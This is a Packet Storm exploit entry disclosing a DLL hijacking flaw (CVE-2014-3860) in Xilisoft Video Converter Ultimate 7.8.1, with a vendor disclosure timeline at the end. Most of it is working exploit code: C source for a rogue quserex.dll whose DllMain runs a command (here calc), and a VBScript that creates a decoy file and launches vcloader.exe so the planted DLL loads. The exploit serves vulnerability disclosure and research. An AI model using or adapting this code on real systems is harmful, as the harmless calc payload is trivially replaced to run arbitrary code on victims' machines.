Xilisoft Video Converter Ultimate 7.8.1 build-20140505 DLL Hijacking

2014-06-02T00:00:00
ID PACKETSTORM:126882
Type packetstorm
Reporter Osanda Malith
Modified 2014-06-02T00:00:00

Description

                                        
                                            `/*  
* Title: Xilisoft Video Converter Ultimate Dll Hijacking Exploit (quserex.dll)  
* Version: 7.8.1 build-20140505 (Previous versions might be vulnerable)  
* Tested on: Windows XP SP2 en  
* Vendor: http://www.xilisoft.com/  
* Software Link: http://www.xilisoft.com/webapp/downloader.php?product_code=x-video-converter-ultimate7  
* Exploit-Author: Osanda Malith Jayathissa  
* /!\ Author is not responsible for any damage you cause  
* Use this material for educational purposes only  
* Twitter: @OsandaMalith  
* CVE: CVE-2014-3860  
*/   
/*  
Vulnerable Executables:  
1. vcloader.exe  
2. vc.exe  
3. vc_buy.exe  
*/  
#include <windows.h>  
int pwned()  
{  
WinExec("calc", 0);  
exit(0);  
return 0;  
}  
  
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)  
{  
pwned();  
return 0;  
}  
  
/*  
As this application as no extensions associated we have to manually a open a file with this application.  
So we can automate this process by writting something like this ;) Place the DLL and this script in the  
same location. Once the victim runs this script the DLL will be hijacked.  
  
msg=MsgBox ("Automated POC" & chr(13) & "Coded by Osanda Malith", 64, "Xilisoft Video Converter Ultimate Dll Hijacking Exploit")  
Set objFileToWrite = CreateObject("Scripting.FileSystemObject").OpenTextFile("new.jpg",2,true)  
objFileToWrite.WriteLine("POC by Osanda Malith :D")  
objFileToWrite.Close  
file = "new.jpg"  
Set oShell = CreateObject("WScript.Shell")  
' Path to Xilisoft Video Converter  
oShell.Run """%ProgramFiles%\Xilisoft\Video Converter Ultimate\vcloader.exe """ & file  
*/  
/* Disclosure Timeline  
2014-04-20 : Contacted the vendor  
2014-04-23 : Contacted again as I did not recieve any reply  
2014-04-24 : Recieved a response saying that it was forwarded to technicians   
2014-05-16 : Contacted again since there is was reply  
2014-05-20 : Recieved a response saying that they cannot reproduce  
2014-06-01 : Contacted MITRE  
2014-06-02 : Public disclosure */  
//EOF  
`